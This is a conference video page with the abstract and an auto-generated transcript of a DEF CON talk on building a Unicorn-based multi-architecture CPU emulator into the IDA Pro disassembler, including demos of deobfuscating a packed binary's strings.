We're sorry but this page doesn't work properly without JavaScript enabled. Please enable it to continue.
Feedback

Emulating all (well many) of the things with Ida

00:00

Formal Metadata

Title
Emulating all (well many) of the things with Ida
Title of Series
Number of Parts
93
Author
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers
Publisher
Release Date
Language

Content Metadata

Subject Area
Genre
Abstract
It is not uncommon that a software reverse engineer finds themselves desiring to execute a bit of code they are studying in order to better understand that code or alternatively to have that code perform some bit of useful work related to the reverse engineering task at hand. This generally requires access to an execution environment capable of supporting the machine code being studied, both at an architectural level (CPU type) and a packaging level (file container type). Unfortunately, this is not always a simple matter. The majority of analysts do not have a full complement of hosts available to support a wide variety of architectures, and virtualization opportunities for non-intel platforms are limited. In this talk we will discuss a light weight emulator framework for the IDA Pro disassembler that is based on the Unicorn emulation engine. The goal of the project is to provide an embedded multi-architectural emulation capability to complement IDA Pro’s multi-architectural disassembly capability to enhance the versatility of one of the most common reverse engineering tools in use today. Bio: Chris Eagle is a registered hex offender. He has been taking software apart since he first learned to put it together over 35 years ago. His research interests include computer network operations, malware analysis and reverse/anti-reverse engineering techniques. He is the author of The IDA Pro Book and has published a number of well-known IDA plug-ins. He is also a co-author of Gray Hat Hacking. He has spoken at numerous conferences including Black Hat, DEF CON , Shmoocon, and ToorCon. Chris also organized and led the Sk3wl of r00t to two DEF CON Capture the Flag championships and produced that competition for four years as part of the DDTEK organization.
33
35
EmulatorBefehlsprozessorGoodness of fitRoboticsVirtual machineCrash (computing)Software frameworkAlgebraic varietyAngleEmulatorComputer animation
Information securityComputerMotion captureFlagBitMultiplication signMotion captureFlagInformation securityRow (database)QuicksortArithmetic meanReverse engineeringComputer scienceProof theoryComputer animation
EmulatorBefehlsprozessorVariety (linguistics)Computer hardwarePhysical systemSystementwurfCodeComputing platformLinear programmingEmulatorOperating systemColor managementArmGastropod shellLine (geometry)Online helpLibrary (computing)CodeIntegrated development environmentComputer hardwareFigurate numberSheaf (mathematics)CASE <Informatik>BootingKernel (computing)Process (computing)Multiplication signDisk read-and-write headComputing platformSPARCOperator (mathematics)Reading (process)Computer animation
BefehlsprozessorEmulatorVariety (linguistics)Computer hardwarePhysical systemSystementwurfCodeComputing platformSoftware frameworkComputer architectureAlgebraic varietyVariety (linguistics)EmulatorPoint (geometry)Presentation of a groupHookingQuicksortInterior (topology)Scripting languageColor managementSlide ruleMultilaterationState of matterCodeLine (geometry)Multiplication signCASE <Informatik>Computer animation
EmulatorBefehlsprozessorMathematical analysisFluid staticsReverse engineeringDisassemblerInformationEmulatorOperating systemCodeBefehlsprozessorMathematical analysisComputer hardwareState of matterSoftware frameworkBitDebuggerResultantDynamical systemReverse engineeringLoop (music)Fluid staticsAlgebraic varietyProcess (computing)Logic gateRight angleContext awarenessString (computer science)Operator (mathematics)Computer animation
ArmDisassemblerCoprocessorDisintegrationDebuggerDisassemblerCompilerBefehlsprozessorFamilyMathematical analysis1 (number)Electronic mailing listState of matterBinary codeCodeDifferent (Kate Ryan album)Process (computing)SubsetArmBitComputer animation
EmulationSoftware frameworkEmulatorArmSource codeVirtual machineUser profileRight angleAlgebraic varietyBlock (periodic table)WindowFamilyGreatest elementBefehlsprozessorProduct (business)Different (Kate Ryan album)Group actionEmulatorState of matterBootingMathematical analysisScripting languageComputer architectureNumberInterface (computing)CuboidRow (database)Software frameworkSoftwareComputer hardwareQueue (abstract data type)MikroarchitekturLink (knot theory)Slide ruleWebsitePower (physics)VirtualizationAssembly languageAbstractionReverse engineeringVideoconferencingProcess (computing)Integrated development environmentPhysical systemDevice driverComputer animation
Source codeEmulatorVirtual machineEmulationGeneric programmingUser profileDebuggerDisintegrationModule (mathematics)Binary fileWeb pageBefehlsprozessorCuboidBitEmulatorVirtual machineOpen sourceAlgebraic varietyVirtualizationPortable communications deviceFluid staticsMathematical analysisModule (mathematics)User interfaceQuicksortMachine visionMultiplication signDemo (music)Combinational logicImplementationDebuggerSimilarity (geometry)Contrast (vision)INTEGRALDifferent (Kate Ryan album)TelecommunicationView (database)Quantum stateRight angleHexagonWeb browserComputer animation
EmulationArchitectureTable (information)WeightCodeEmulatorDatabasePlug-in (computing)Read-only memoryDebuggerModule (mathematics)ForceImplementationComputer architectureEmulatorMultiplication signDampingBefehlsprozessorDatabaseInformationRight angleState of matterView (database)CuboidDebuggerProcess (computing)Link (knot theory)HexagonAxiom of choiceCASE <Informatik>BitGastropod shellMathematical analysisArithmetic meanFluid staticsCodeComputer programmingFile viewerImplementationGroup actionOrder (biology)Reading (process)QuicksortStandard deviationDisassemblerComputer animation
Plug-in (computing)Software frameworkBeta functionEmulatorInterface (computing)Meta elementOrder (biology)Interface (computing)Electronic visual displayMultiplication signBitSlide ruleStatement (computer science)State of matterDebuggerUser interfaceAlpha (investment)NumberSoftware developerRight angleINTEGRALSoftwareBeta functionReverse engineeringCASE <Informatik>Task (computing)MereologyT-symmetry1 (number)Mathematical analysisFluid staticsPlug-in (computing)Computer animation
BefehlsprozessorSheaf (mathematics)BootingCodeArmDatabaseFile formatType theoryInformationLinear programmingEmulatorSystem callComputing platformContent (media)Level (video gaming)32-bitAddress spacePhysical systemComputer architectureInterface (computing)DebuggerUtility softwareStack (abstract data type)SPARC1 (number)ResultantStructural loadBootingBinary codeFamilyWindowRight angleForm (programming)BefehlsprozessorKernel (computing)Process (computing)Line (geometry)Sheaf (mathematics)Plug-in (computing)State of matterComputer animation
BuildingDisintegrationInterface (computing)EmulationCodeAlgebraic varietyBuildingComputing platformBinary codeContinuous integrationWindowComputing platformWebsiteRight angleState of matterBitLibrary (computing)Revision controlGoodness of fit32-bitUtility softwareINTEGRALComputer animation
CodeDemo (music)Ideal (ethics)Alpha (investment)Local ringArmEmulatorControl flowEmulatorLevel (video gaming)DisassemblerDifferent (Kate Ryan album)Utility softwareComputer animation
Machine codeUser interfaceEmulatorInterface (computing)Sheaf (mathematics)Fluid staticsRevision controlVideo game consoleRight angleGoodness of fitDebuggerBinary codeVirtual machineComputer animation
Machine codeDebuggerDatabaseSystem callCuboidDebuggerNumberOrder (biology)Local ringBinary codeFunktionalanalysisCodeComputing platformLibrary (computing)Natural numberWindowString (computer science)Context awarenessComputer animation
Function (mathematics)Parameter (computer programming)InformationCompilation albumMachine codeSystem callString (computer science)CuboidBitMereologyDemo (music)XMLComputer animation
Machine codeUser interfaceCuboidDebuggerStandard deviationPoint (geometry)Interface (computing)Process (computing)NumberEmulatorString (computer science)State of matterInterprozesskommunikation2 (number)Control flowRight angleView (database)Semiconductor memoryComputer animation
Machine codeComa BerenicesEmulatorThread (computing)Abstract syntax treeMassSemiconductor memoryMathematicsNormal (geometry)DatabaseMultiplication signView (database)Right angleData storage deviceInterface (computing)Computer architectureComputer animation
Machine codeLoginCloningMereologyDatabaseFunktionalanalysisInteractive televisionString (computer science)WindowCuboidRight angleRobotCodeSpacetimeComputer animation
Machine codeSystem callChainTable (information)Address spaceVirtual realitySheaf (mathematics)ACIDLine (geometry)Kernel (computing)CodeSpacetimeMathematical analysisRobotUser interfaceRight angleDatabaseCuboidResultantWindows RegistryPoint (geometry)String (computer science)Library (computing)Fluid staticsDemo (music)Computer animation
Machine codeSystem callDebuggerString (computer science)Address spaceDocument management systemStructural loadKernel (computing)Group actionLoginMenu (computing)Demo (music)DebuggerMultiplication signString (computer science)CodePlug-in (computing)Right angleLibrary (computing)Greatest elementState of matterDatabaseEmulatorPoint (geometry)Loop (music)CuboidComputer animation
Sheaf (mathematics)Virtual realityAddress spaceTable (information)FlagChainMachine codeLocal ringEmulatorArmControl flowState diagramDebuggerWindowHydraulic jumpCodeRight angleBinary codeArmComputing platformSoftwareConnected spaceEmulatorComputer hardwareLocal ringComputer animation
Machine codeBeer steinSystem callString (computer science)Symbol tableBinary codeArmDebuggerWindowRight angleComputer architectureComputer animation
Machine codeString (computer science)Function (mathematics)Thread (computing)ArmVirtual memoryRemote procedure callRight angleIntegrated development environmentPoint (geometry)Arrow of timeTelecommunicationState of matterCrash (computing)Exception handlingComputer animation
Machine codeEmulatorLocal ringArmControl flowIntegrated development environmentDebuggerControl flowComputer configurationRight anglePoint (geometry)Linear programmingAxiom of choiceCodeComputer animation
State diagramDecimalSystem callHill differential equationVariable (mathematics)String (computer science)InformationFluid staticsView (database)Binary codeString (computer science)DistanceoutputBuffer solutionMultiplication signDebuggerLogical constantUniform resource locatorParameter (computer programming)NeuroinformatikHost Identity ProtocolRight angleComputer configurationDifferent (Kate Ryan album)BitDynamical systemComputer fileScripting languageAutomationContent (media)NumberFreewareIntegrated development environmentAddress spaceProcess (computing)Clique-widthPattern languageEmulatorComputer animation
Insertion lossBit rateUniformer RaumMachine codeString (computer science)Data dictionaryParameter (computer programming)Buffer solutionBinary codeGreatest elementKey (cryptography)StapeldateiWindowComputer animation
Demo (music)QuadrilateralDiscrete element methodMusical ensembleMachine codeMetropolitan area networkString (computer science)User interfaceVariable (mathematics)Greatest elementComputer fileFunction (mathematics)StapeldateiBinary codeScripting languageWindowDirectory serviceCausalitySource codeComputer animation
Demo (music)Musical ensembleDemosceneEmulatorSystem callScripting languageBinary fileFunction (mathematics)PrototypeUser interfaceImplementationPhysical systemLibrary (computing)Structural loadComputer configurationStapeldateiFlash memoryDebuggerFunction (mathematics)Parameter (computer programming)Asynchronous Transfer ModeOcean currentBinary codeLoop (music)Directory serviceRight angleComputer fileEmulatorDialectSystem callFunktionalanalysisMathematicsHookingLibrary (computing)Computer configurationInterface (computing)Physical systemShared memorySemiconductor memoryInternet service providerExecution unitScripting languageMobile appState of matterFeedbackUser interfaceSource codeComputer animation
Demo (music)Video game consoleWindowFunction (mathematics)Right angleComputer animation
System callControl flowMathematical analysisDifferent (Kate Ryan album)Computer programmingKey (cryptography)Point (geometry)Binary codeStack (abstract data type)Buffer overflowNumberString (computer science)CodeChainParameter (computer programming)MathematicsSystem callLevel (video gaming)Multiplication signData storage deviceBuffer solutionInformationLogicScripting languageForcing (mathematics)Process (computing)Right anglePairwise comparisonReverse engineeringComputer animation
Transcript: English(auto-generated)
All right, Def Con. So, you're at the last talk of the evening. Please welcome Chris Eagle. Thanks very much. Anybody hear me? Can't hear you? Can't hear me? Good. I'm Chris
Eagle, thanks for coming. We've got the Mr. Robot panel next door. Maybe you're all here to just stare at the sexy machines back here, I don't know. I'm about tired of them. Oh, where'd my sheep go? She wandered off. Okay, wrong angle. Not her best side.
Okay, I'm here to talk about a project that I've been working on, for lack of a better name, called School Debug. And it's about emulating various processors using the
Unicorn framework for emulation that was released at Black Hat last year. And because it's kind of what I do, it's all baked into IDA and we'll see if it's interesting and go through a couple examples and watch things crash and hopefully have some fun. I gotta
say this, everything I say today is my own opinion, not that of my employer and certainly not that of DARPA. They don't let me talk on there right now. A little bit about me if you don't know, these folks down here in the front row are filling seats to make the room look full. Uh, I'm a senior lecturer of computer science out at a place
called the Naval Postgraduate School in Monterey, California. Um, doing security related stuff for a long time now. Uh, do a lot of reverse engineering of various sorts. I play a lot of the capture the flag. I'll be racing back over there right after this talk is over. And uh, a performer of really stupid IDA tricks, right?
Proving that just because it can be done doesn't mean it should be done, but that's what you're here to watch, I guess. Uh, so this is really about CPU emulators, right? And uh, they're useful in a lot of cases where you may not have a hardware to run a
particular uh set of code on, whether it's a well structured binary or just a small snippet of something like say a shellcode. And you don't happen to have an ARM device or a MIPS device or a SPARC device sitting around and you want to know how this thing behaves. So you're either going to become the world's best human MIPS engine and you
can interpret this stuff in your head and process it and figure out what's going on. Or you might want some help. Okay, and that's uh what I was looking for when I started thinking about baking emulators into things like IDA. Because in my particular use case, IDA is virtually my desktop. I'm in it all the time and I often have the desire to
step out and execute something because perhaps my comprehension of the instruction set is not sufficient enough for me to understand what I'm reading or I just want to verify my suspicions about the behavior of a section of code. Like to run through it, perhaps not an entire executable. Maybe I don't want to have to load up the ELF and deal with, you
know, the kernel loader and the operating system, etc. And um, libraries and just a full-blown execution environment just to run through 5 or 10 lines of code. Okay, so thought about this and decided, you know, if I could just run these lines of code anytime I wanted
in some very stripped down environment, wouldn't that be nice? We'll talk about how I got to that, got there from here. Now you also may want to run code on obsolete platforms, because you don't have real hardware to do it on. There's plenty of software emulators out there these days that do these kinds of things, but another use case for
emulation and there's another one I missed and I'm not going to go back. Um, so emulators run the gamut from the simplest emulators that there are. Unicorn is in fact a fairly simple emulator. In fact, it's not itself an emulator, it's not a standalone thing. It is
an API that lets you point at instructions and execute instructions one or more at a certain time. Okay, receiving some signals along the way. You can hook into it and get callbacks and so on. And I'm really not going to talk about the inner workings of Unicorn, but I would encourage you to go out and try to find some of the slide decks that they've posted following Black Hat last year, there's some other presentations
they've given at a variety of conferences, and dig into the project if you think you have a use for baking an emulator into anything. It is sort of to execution of instructions, that's what Capstone was to disassembly of instruction sets. A fairly
general purpose framework across many architectures that lets you script up things very quickly. And in this case, we're going to execute things in just a few lines of code. That's the basics of Unicorn, all I'm going to get into. But there are some fairly sophisticated emulators out there, I will refer to those later on, but Unicorn
is literally pointing at an instruction and update the internal state of Unicorn and that is it. If that instruction manipulates hardware, you're not going to get anything like that. So the notion of a full blown emulator, like a QEMU, isn't what you're going to
get out of Unicorn. So the idea with this project was to build a lightweight CPU emulator available in a static reverse engineering context. I didn't want to have to go full on dynamic analysis with debuggers and processes and hardware operating system, any of that
stuff. I just wanted a very lightweight emulator that would let me step through code. We can expand on it from there and I'll go into a little bit about the history and what led me here again in a couple slides. The idea is you're looking at some code, we step out of that static context, we go execute through some instructions in
this emulated manner, and then we take the knowledge that we gained by observing the execution state either to enhance our understanding of the binary or maybe incorporate some of that information back into our static picture to perhaps improve a disassembly, make some annotations, what have you. Maybe something as simple as utilizing a simple loop
that you see in some code to decrypt, decode, de-obfuscate, whatever it might be, whether that itself is code, self-modifying code, or whether it's some data, some strings, anything like that, and then bring that data or that information back into our static
analysis without having to continue execution. Okay, and so the end result is what I'm going to talk about today. It's this lightweight emulator that I baked into IDA because if it's not in IDA, I'm probably not going to use it. And that provides my static
analysis side, my disassembly side, and then the emulator, as I mentioned previously, is going to be based on this unicorn framework. I imagine if you're sitting in this room today, you're probably familiar with IDA. So if you're not, it's a commercial
disassembler. There are some other disassemblers out there. We're seeing new ones every day. Binary Ninja is a new one that was just released, and maybe we can take this project and integrate it with that someday. But for now, I'm primarily working in IDA. It supports a lot of different processor families, and so that, to me, made it attractive to
marry up with Unicorn, which also supports a lot of different processor families. Not as many processor families as IDA does, but more than one, more than two, more than three, I don't know, six or so. I'll list them out here in a minute. But it meant that IDA could understand all of the code that I would ever want to emulate in Unicorn. Okay, because the processors that IDA supports are a superset of the processor
architectures that are supported by Unicorn. Okay, it's got, uh, IDA itself has integrated debugging support, okay, so actual dynamic analysis, let's fire up a process attached to it and pull in state, uh, for, uh, x86 and ARM targets, and it can do some
remote debugging on some other targets. It also has, uh, a decompiler for 32 and 64 bit x86, along with 32 and 64 bit ARM, but that's not entirely relevant to our talk today. Unicorn, as I mentioned, was introduced at Black Hat last year, uh, comes again out of
the same group that, uh, did, uh, Capstone, the disassembly framework, and now they have, uh, a tool called Keystone. In fact, uh, they may have talked about it at Black Hat. Anybody at Black Hat? Did they do Keystone this year? Yep. So they talked about their new project, Keystone. I hope these guys keep coming back. That's like three years in a row, Capstone, Unicorn, Keystone. Uh, they're all pretty useful
projects, and Keystone is their assembly framework, so now we have a disassembly framework, an assembly framework, and an emulation framework, and you start, uh, rolling these things together and you get a pretty powerful, uh, reverse engineering capabilities. Okay, uh, there's the link out that their site is up there on the slide. Uh, it, as an emulation framework, is actually based on QEMU, so if you've ever
used QEMU, you know that it also supports a large number of architectures, and you might say, well, why do we have Unicorn if QEMU supports a large number of architectures and, in fact, you, uh, Unicorn is based on QEMU, right? Isn't this
just the same thing all over again? Okay, the answer's not quite. Okay, QEMU has a lot of support, uh, all the way down into hardware shims that lets you do full blown system emulation, and we can, we can boot Linux, we can boot Windows into QEMU environments because it has that support for hardware interfaces and virtual devices and so on. Uh,
the Unicorn folks were not interested in any of that. All they wanted to do was be able to emulate processor instructions. Okay, they don't want the hardware interface, they're trying to provide you network and video drivers or any of that stuff, and they just wanted
to help you, uh, emulate instructions. What does it do? Let's see, right, we run it in the emulator. What they did was they tore into QEMU, they ripped out all of that hardware abstraction layer, and were left only with, effectively, the processors,
right, the software CPUs, uh, that they then layered on top of, right, we instantiate a processor, we give it some state that it can manipulate, and they give you access to that processor state, nothing more. Okay, expose some of, uh, that up to a couple
of different types of APIs, and there you have it, right, the scriptable emulator. Supports the family, the processor families that you've seen here, x86, both 32 and 64 bits, same for ARM, Spark, MIPS, and Motorola 68000, uh, that's not all of the processor families that are supported by QEMU, okay, but it's a start. It does take a fair
amount of work, uh, to provide the interface to a given processor architecture, uh, but I don't think it would be a stretch to add in some of the other processor families that are supported by QEMU if you wanted to enhance the capabilities of Unicorn. Okay, a
number of projects, this is just one of them, uh, have come along which make use of Unicorn, some of them are, uh, pretty amazing, and, uh, baked into a lot of very interesting analysis frameworks, uh, post a link at the bottom because, uh, you may be more interested in those, uh, than Unicorn itself because they provide, uh, somewhat
more finished products, right, these are things that you'd make use of right out of the box, right, if you did not intend to bake, you know, if you didn't have a need to script an emulator of your own, okay, so you can go find those out there and play around, so, okay, so I picked IDA and I picked Unicorn, uh, there are some other emulators as
I've mentioned, I've talked about QEMU already, I've talked about, uh, I haven't talked about Box, Box is another one, okay, it is a, uh, a pure x86 emulator, these are blurbs, uh, off of each of their project pages, right, Box is a highly portable open-source 32-bit, uh, x86 emulator, and while QEMU is more general, a generic, more
processors, uh, open-source machine emulator and virtualizer, it's a little bit more sophisticated than Box, but it's also, uh, there's a lot more to it, uh, than Box, okay, so, could have gone with, uh, either of these, I suppose, but they really weren't
geared to script around, okay, and just, just access just the processor bits, and, uh, so this is sort of where I, I've been with this project, okay, it's, uh, it's been kind of a long road, Unicorn came along and filled a need that I had and actually fulfilled, uh, a vision that I had back in 2003 when I built a tool called IDA x86emu, okay, where I
wanted to do exactly what I described, I wanted to sit in IDA and I just wanted to emulate things, okay, and use that to either transform my, my static analysis picture or enhance my understanding of the behavior of something, okay, so I, I did that, and at the time that I did that, I looked at those emulators, primarily Box and QEMU back then, and
thought, you know, can I rip into this, strip out the bits I don't need, and take just the emulator, and I looked at it, and I'm lazy, and I said, hell no, maybe because they're way too big, right, so 13 years later, 12 years later, somebody did it for me, okay, and so then I revisited this project and retooled and that's, again, why I'm
talking today, right, somebody did all the heavy lifting by stripping out all the, all the unnecessary stuff out of QEMU and dropping it in my lap, okay, along the way, the hex-rays folks did an integration between hex-rays and Box, they did it in a slightly different way, I'll do two quick demos later on of what these things look like and
the different approaches that you might take as you think about doing emulation in combination with a static analysis, and so they released a Box debugger module that Ida could communicate with, right, if you're familiar with Ida, you understand what the debugging views look like in contrast to the pure static analysis views, and we'll see
that here in a few minutes, did a similar thing for MSP430 processor, which was the processor that got used for the micro-corruption challenges, if any folks have seen that, they're a lot of fun, and they were, that was a pure MSP430 implementation and I
didn't want to deal with their clunky user interface through a, through a browser, so did this emulator, it was in a style very similar to Ida x86emu, and then along came Unicorn, and it took me a while, but I finally decided to integrate it into Ida, and
to see if I liked it better or provided, proved more useful than some of these other combinations of tools. As I mentioned, I looked at QEMU and Box briefly, but it was going to be a lot of work, I didn't have the time to do it all, and again,
somebody else came along and did it, and their approach, because we finally get QEMU involved in this whole thing, it gives us a lot more processors, right, than my particular approach, which was specifically an x86 emulator, and so I got that one narrow architecture, and I've never had another architecture, and I've never wanted to do
another architecture, because doing an architecture from scratch was just more work than I wanted to get involved with, so, this was a nice marriage for me. Now, to the implementation. In implementing this, I had to make a couple of choices, okay, again,
hopefully people are somewhat familiar with Ida and what it looks like. With Ida, you get your standard disassembly view, and then there's this debugging view, but you have to do a little bit of work to integrate what you learned from the debugger back into the
disassembly view, and oftentimes it involves overwriting a lot of information in your disassembly view, so you might go into the debugger and learn something, but it's fairly transient in nature, because you're starting a process, and eventually that process is going to terminate, and the information that you learned vanishes with that
process. There are ways to migrate some of that information back into Ida, overwriting your original data in Ida, but you'd have to automate some of that, and it's not necessarily a very clean approach. So, the alternative approach is you don't jump out into a debugger and you find some way to incorporate emulation right there alongside
your static analysis view. In order to do that, your emulation has to be able to maintain state, so you're either maintaining state entirely separately from what you're looking at in Ida, right? In Ida, you get to see an entire disassembly, right, through the various portions of a program, your code, your data, etc. What you don't have are things
like a stack, or a heap, right, any of your virtually allocated memory. Uh, and, but you need that in the emulation. So you either start modifying your database and adding all of that, those bits and pieces in there, right, so that you expose them and make them
available to view and navigate through, or all of that information remains buried in the emulation and you have to come up with some way to propagate just what you want up into the static analysis view when you're ready to consume it, right, when you've decided that you've learned what you wanted to learn and you're ready to annotate that static analysis. When I did x86emu, I took the first approach, and you're literally
emulating on top of an existing Ida database, so as you do the emulation, your database gets modified, and there are some advantages and disadvantages to that approach, right, the disadvantage is obviously that it's destructive, okay, so once you've modified
something, if you know, if you're an Ida user, you know there's no undo in Ida, right, so once you've modified it, right, there's no going back, right, so if you want to see what it used to look like, you're either maintaining a separate database, a lot of snapshots, uh, and it becomes, it becomes a headache, but there, I have found it to be useful in many cases. The alternative approach is to take a debugging sort of approach,
and generally speaking, in Ida, that means you're launching a process and you're attaching to it in the way that a standard debugger would attach to that process, controlling the process, viewing the state of the process, uh, using Ida as a viewer,
okay, so you see what the running process state is, it gives you access to all the things you'd have in a typical debugger, and in this case, you're not manipulating your static view at all, that Ida database doesn't get changed at all unless you absolutely want it to, okay, your view is strictly into that transit process,
okay, and again, when it's done, you're done, okay, perhaps you learn something, perhaps you use it to update your state, okay, the way you use that is entirely up to you. This is the approach that the hex-rays folks took when they integrated Box into Ida, okay, Ida shells out to Box, they created some IPC links between Ida and Box, Ida
pushes the state into Box, okay, including, right, the code, the data that are being represented in that Ida database, and then tells Box to go, right, gives it an initial reg- initial register state, and then single steps or allows it to run freely, okay, as you
see fit, right, then pulls the data back out of Box and shows it to you in Ida's debugger view, but again, once you're done, you're done, and none of that updates your static analysis state. As I mentioned, there are some ways to pull state back into Ida, but, you know, it's entirely up to you how you're going to do it. I'll show you some demonstrations, I'll show you two approaches, and you can use that to understand what I
did with Unicorn. In the case of Unicorn, the approach I ended up taking was the debugging approach, okay, because it just felt a little bit cleaner, I didn't want to get into updating databases, I wanted to leave things flexible for the future, might come
along and implement it differently, but in order to implement it outside of a debugger, Ida doesn't provide you any tools, uh, to display something like registers, for example, any of that execution state, right, while you're in a static analysis state,
registers have no value, so you have to invent that user interface yourself, okay, so that's one of the hard parts about doing it, um, outside of the debugger state. My slide, I don't know, or agreeing with it. In any case, um, I took on this task, trying to
integrate Ida with Unicorn, a lot of unhappy development time, a supportive wife, a lot of time dealing with a mostly undocumented Ida interface, dealing with a particular style of plugin known as a debugger plugin, again, for those of you who know Ida, you know the
state of its documentation, so I spent a lot of time reverse engineering Ida to try to learn how their debuggers actually work, because there isn't much to go on there. At the same time, I was trying to integrate a piece of software that was really, I say beta, that's kind of generous, at the time I was doing this, it was more like pre-alpha, okay, so, uh,
you never know where the problems lie, is it Unicorn, is it Ida, is it me, uh, and, uh, that's what led to bullet number one. But in the end, I was able to subclass Ida's debugger
type, to provide debuggers for all of the supported Unicorn processor families, and end up with a debugger style interface for any one of these architectures, that you could use to emulate code wherever you are, so, if you're using Ida on Windows, and you're running
Unicorn, and you open up a MIPS binary, you don't have to go find a MIPS platform anywhere, right, you can just pop out into the debugger and emulate through your MIPS code, and if you want to, you can utilize Ida's features for pulling some of that information back. Same is true for Spark, or ARM, what did I say, 68K, x86, 64-bit x86
on the 32-bit platform, or vice versa? Um, so, uh, I got exactly what I wanted 12 years ago, with a lot more flexibility, right? As it's doing this, you can go anywhere from basic, I've got five lines of code I want to emulate, to trying to emulate through an actual
process, right, if the code is formatted in the form of an executable, like an ELF, or a PE, the debugger plugin tries to load that up and map that into an address space that is roughly what you get if you were to run it on the actual architecture the binary was
intended for. There's a lot of challenges with doing that, we don't get to emulate through the kernel, we don't have a system call interface, although, I'll talk about later, one of my goals is to add the capability of hooking system calls, so you can
stub out some of the more common ones perhaps, and provide some fake results back up into your emulation. So, the debugger includes very basic loaders for PEs and ELFs, right, that load those two file formats into unicorns, state into the unicorn emulation before you
start up your emulation, gives you stacks, and so on. If you don't have a format that unicorn recognizes, or the school debug recognizes, then all it does is takes the entire content of your IDA database and just copies it out into map sections in the unicorn
emulator, so however it's mapped in IDA, that's what you get out of unicorn, it usually throws in a stack, because that's something that you're going to need, that you don't ever see in IDA, okay, but stacks are pretty useful, and an awful lot of instructions make it useful. Some of the issues with doing all of this, if anybody's used unicorn,
right, you might have some familiarity with building that, uh, IDA is a 32-bit executable, okay, even though you may see, well, there's this 64-bit version of IDA out there, all that means is that it can understand 64-bit binaries, okay, it is still a
32-bit native executable when you go to run it, that means that if you want to integrate with it, you've got to build 32-bit libraries, okay, so when you build unicorn, you've got to build it, the 32-bit library of unicorn for the platform you're running IDA on, okay, whether that's Windows, Linux, or a Mac, okay, unicorn unfortunately doesn't
have very good support for building 32-bit libraries, right, they sort of assume that everybody's doing 64-bit stuff these days, why would you want to build 32-bit binaries anymore, okay, so we had to fix that up a little bit, and they're getting better, uh, at being able to build 32-bit binaries, uh, doesn't also have, also does not have very
good support for building on Windows, and that's primarily related to QEMU's dependence on GLib, which is not found on Windows platforms, unless you reach out and get things like Sigwin, right, or Ming, and install the requisite libraries out of those
particular utilities, okay, so this complicates, uh, Windows builds, in fact, they don't have Windows, uh, built into their continuous integration, uh, when you, uh, go observe how the project is, uh, the state of the project out on their, uh, GitHub site, uh, so it makes building on Windows a little bit tough, okay, but it can be overcome, and in the end,
you're able to integrate, uh, Unicorn into IDA on all the platforms for which IDA is available, it's about all I'm going to talk about at a high level, it's pretty straightforward, here's a, here's a disassembler, here's an emulator, and, uh, it either
works or it doesn't, okay, so we'll see, I'm going to go through some demos, uh, and show you what it looks like, uh, I'm going to start off with, uh, some simple deobfuscation stuff, I'm going to show it to you in a couple different ways, I'm going to go through it fairly quickly, alright, I'm not going to try, I'm going to try not to get bogged down into the details of IDA-isms or how to use IDA or things like that, I'm
just going to show you what each of these things do, what they look like, uh, and, uh, let you form your own opinions as to the utility of each and perhaps, uh, whether you prefer one approach to another, so if this all works out, I'm going to use this old style emulator, let's see, I've got to pick the right version of IDA, okay, we'll do this
one, alright, so you may recognize the section name, alright, this is just a UPX pack binary, and if all goes well here, alright, I'm going to bring up this old emulator, please work, it's coming, my machine's slow, okay, this is an example of, uh, the
original x86 emulator that I did in IDA, good jokes, and what you're going to see here, assuming this works, is a, a crude, like, debugger, uh, console that's going to
come up, we're not going to leave IDA's static user interface, I'm not happy with this, uh, and we're going to be able to emulate through, uh, IDA with, uh, without leaving its common interface here, unless it never comes up, awesome, okay, while
that's going on, we may as well start the other one, okay, uh, behind this door, okay, we're going to try and do this with Box, okay, IDA's integrated Box plugin, so in order to do that, we've got to switch our debugger over, and you see IDA offers a number
of debuggers, it's context aware, what platform you're running IDA on, and the nature of the binary, uh, that you're loading up, so you can see one of these is a local Box debugger, and assuming I haven't messed this up either, and still have Box installed properly, alright, if I choose Box as a debugger, oh, that doesn't do anything, we've got
to actually run it, right, so I'll set a breakpoint at the beginning of the code here, I'll set a breakpoint down towards the end over here, okay, we're not going to jump out and execute any of these function calls because they jump out into Windows libraries, alright, we'll just set a breakpoint down here at the end, maybe bring up a
strings view, try to convince you that it's actually doing work, alright, all these strings, I don't know if that shows up at all, uh, but these are the obfuscated strings that are part of the binary, alright, you can see bits and pieces of strings, but it's not fully deobfuscated, and if Box lets me do this, yeah, and then we can start
debugging, and this is going to toggle into, maybe, a segue back to the other demo,
no, there's Box, there's Box starting up, I've got too much going on in this machine, okay, and so it, IDA started off Box, it's got this IPC channel between the two, okay, and now IDA gives us a debugger view, right, we're not really running the process, okay, all
the, all the emulation data has been stuffed into Box, and Box is going to do its thing, but this is a standard IDA debugger view, if you were running a process and actually attached to it, this is what you'd see, it's not the best user interface in the world, it's probably the number one knock against using IDA as a debugger, right, is its user interface is not great, but we can step through it, right, and the register state updates
up here, and so on, right, and we can let it run, and we should hit our second break point at some point down there, and we can go back and look at the strings on the binary, and maybe if I did this right, you're just going to have to trust me, I
don't know, wow, it's got to pull these strings out of Box memory, alright, let's see how
our other thing is doing, look at that, it's like a cooking show, we've got a couple things in the oven at a time, right, so this is back to the emulated view, right, IDA x86 emu, totally different view, we never leave, um, the, uh, normal IDA
interface, and you've got this tiny little panel that pops up, right, it's very specific to x86, so taking this approach with other architectures, you would have to come up with your own interface, right, and replace all the x86 registers with whatever registers you have for that particular architecture, alright, it lets you do some things
like manipulate memory, memory is really just the database, everything you're manipulating is just a change to the database, alright, and you're just, that's your memory store, you fetch bytes out of the database, you emulate them, you modify the database, if that's what it says to do, uh, but, again, it's destructive, right, so we can sit here and I can click on, you know, step, step, and it's hard to see, but if you
watch the blue here, and it doesn't really highlight, that blue is stepping through various instructions and will jump down and it follows through and so on, and I can reach down to the same part of the binary, okay, which is down here before these function calls, set a breakpoint, and say run, and this is, uh, much slower than box, because,
actually, it's, all the interactions with the IDA database are pretty slow, but we hit our breakpoint and we can go back to our strings window, and set this thing back up again, and we should have lots of interesting strings, right, like this, and this is just
an old IRC bot, but we got all these strings out of it because it's mostly deobfuscated, and then you say you're done, right, we close this up, and you go back
here, and, in fact, what was formerly empty space is now code that we can go and disassemble, right, we didn't hop into a debugger, we've destroyed our database, right, it doesn't look like it used to look, okay, but we've got deobfuscated code, and we just continue at this point doing static analysis, okay, so it's a quick in and
